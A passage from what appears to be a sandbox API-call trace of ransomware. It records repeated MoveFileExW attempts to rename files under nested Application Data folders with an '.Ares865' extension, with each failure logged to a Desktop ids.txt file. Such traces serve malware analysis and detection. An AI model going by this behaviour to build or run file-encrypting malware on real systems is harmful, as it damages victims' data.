Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log.Ares865") returned 138 [0090.751] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\microsoft\\windows defender\\support\\mplog-09132019-235903.log"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\microsoft\\windows defender\\support\\mplog-09132019-235903.log.ares865"), dwFlags=0x1) returned 0 [0090.751] GetLastError () returned 0x20 [0090.751] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log MoveFileEx error 32\r\n") returned 160 [0090.751] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log MoveFileEx error 32\r\n") returned 160 [0090.751] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0090.751] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4979 [0090.751] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xa0, lpOverlapped=0x0) returned 1 [0090.752] CloseHandle (hObject=0x118) returned 1 [0090.752] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0090.752] CloseHandle (hObject=0x0) returned 0 [0090.752] CloseHandle (hObject=0x0) returned 0 [0090.752] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x666ec5c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x666ec5c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x666ec5c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MPLog-09132019-235903.log", cAlternateFileName="MPLOG-~1.LOG")) returned 0 [0090.752] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.752] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2588 [0090.756] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865") returned 117 [0090.756] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat.ares865"), dwFlags=0x1) returned 0 [0090.756] GetLastError () returned 0x20 [0090.756] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 139 [0090.756] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 139 [0090.756] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0090.757] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4a19 [0090.757] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x8b, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x8b, lpOverlapped=0x0) returned 1 [0090.757] CloseHandle (hObject=0x118) returned 1 [0090.757] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0090.757] CloseHandle (hObject=0x0) returned 0 [0090.757] CloseHandle (hObject=0x0) returned 0 [0090.757] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 0 [0090.757] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.757] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c90 [0090.783] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log.Ares865") returned 155 [0090.783] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\microsoft\\windows defender\\support\\mplog-09132019-235903.log"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\microsoft\\windows defender\\support\\mplog-09132019-235903.log.ares865"), dwFlags=0x1) returned 0 [0090.784] GetLastError () returned 0x20 [0090.784] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log MoveFileEx error 32\r\n") returned 177 [0090.784] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log MoveFileEx error 32\r\n") returned 177 [0090.784] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0090.784] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4aa4 [0090.784] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xb1, lpOverlapped=0x0) returned 1 [0090.784] CloseHandle (hObject=0x118) returned 1 [0090.784] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0090.784] CloseHandle (hObject=0x0) returned 0 [0090.784] CloseHandle (hObject=0x0) returned 0 [0090.784] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x666ec5c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x666ec5c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x666ec5c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MPLog-09132019-235903.log", cAlternateFileName="MPLOG-~1.LOG")) returned 0 [0090.784] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.784] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2568 [0090.788] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865") returned 134 [0090.788] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat.ares865"), dwFlags=0x1) returned 0 [0090.789] GetLastError () returned 0x20 [0090.789] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 156 [0090.789] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 156 [0090.789] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0090.789] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4b55 [0090.789] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x9c, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x9c, lpOverlapped=0x0) returned 1 [0090.789] CloseHandle (hObject=0x118) returned 1 [0090.789] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0090.789] CloseHandle (hObject=0x0) returned 0 [0090.789] CloseHandle (hObject=0x0) returned 0 [0090.789] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 0 [0090.789] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.789] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c70 [0090.817] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log.Ares865") returned 172 [0090.817] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows defender\\support\\mplog-09132019-235903.log"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows defender\\support\\mplog-09132019-235903.log.ares865"), dwFlags=0x1) returned 0 [0090.817] GetLastError () returned 0x20 [0090.817] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log MoveFileEx error 32\r\n") returned 194 [0090.817] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log MoveFileEx error 32\r\n") returned 194 [0090.818] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0090.818] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4bf1 [0090.818] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xc2, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xc2, lpOverlapped=0x0) returned 1 [0090.818] CloseHandle (hObject=0x118) returned 1 [0090.818] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0090.818] CloseHandle (hObject=0x0) returned 0 [0090.818] CloseHandle (hObject=0x0) returned 0 [0090.818] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x666ec5c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x666ec5c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x666ec5c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MPLog-09132019-235903.log", cAlternateFileName="MPLOG-~1.LOG")) returned 0 [0090.818] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.818] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d25e8 [0090.823] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865") returned 151 [0090.823] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat.ares865"), dwFlags=0x1) returned 0 [0090.823] GetLastError () returned 0x20 [0090.823] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 173 [0090.823] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 173 [0090.823] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0090.823] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4cb3 [0090.823] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xad, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xad, lpOverlapped=0x0) returned 1 [0090.823] CloseHandle (hObject=0x118) returned 1 [0090.823] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0090.823] CloseHandle (hObject=0x0) returned 0 [0090.824] CloseHandle (hObject=0x0) returned 0 [0090.824] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 0 [0090.824] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.824] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c50 [0090.868] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log.Ares865") returned 189 [0090.868] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows defender\\support\\mplog-09132019-235903.log"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows defender\\support\\mplog-09132019-235903.log.ares865"), dwFlags=0x1) returned 0 [0090.868] GetLastError () returned 0x20 [0090.868] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log MoveFileEx error 32\r\n") returned 211 [0090.868] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log MoveFileEx error 32\r\n") returned 211 [0090.868] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0090.868] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4d60 [0090.869] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xd3, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xd3, lpOverlapped=0x0) returned 1 [0090.869] CloseHandle (hObject=0x118) returned 1 [0090.869] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0090.869] CloseHandle (hObject=0x0) returned 0 [0090.869] CloseHandle (hObject=0x0) returned 0 [0090.869] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x666ec5c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x666ec5c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x666ec5c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MPLog-09132019-235903.log", cAlternateFileName="MPLOG-~1.LOG")) returned 0 [0090.869] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.869] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2608 [0090.874] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865") returned 168 [0090.874] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat.ares865"), dwFlags=0x1) returned 0 [0090.874] GetLastError () returned 0x20 [0090.874] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 190 [0090.874] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 190 [0090.874] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0090.874] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4e33 [0090.874] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xbe, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xbe, lpOverlapped=0x0) returned 1 [0090.874] CloseHandle (hObject=0x118) returned 1 [0090.874] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0090.874] CloseHandle (hObject=0x0) returned 0 [0090.875] CloseHandle (hObject=0x0) returned 0 [0090.875] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 0 [0090.875] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.875] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c10 [0090.905] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log.Ares865") returned 206 [0090.905] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows defender\\support\\mplog-09132019-235903.log"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows defender\\support\\mplog-09132019-235903.log.ares865"), dwFlags=0x1) returned 0 [0090.906] GetLastError () returned 0x20 [0090.906] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log MoveFileEx error 32\r\n") returned 228 [0090.906] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log MoveFileEx error 32\r\n") returned 228 [0090.906] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0090.906] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, 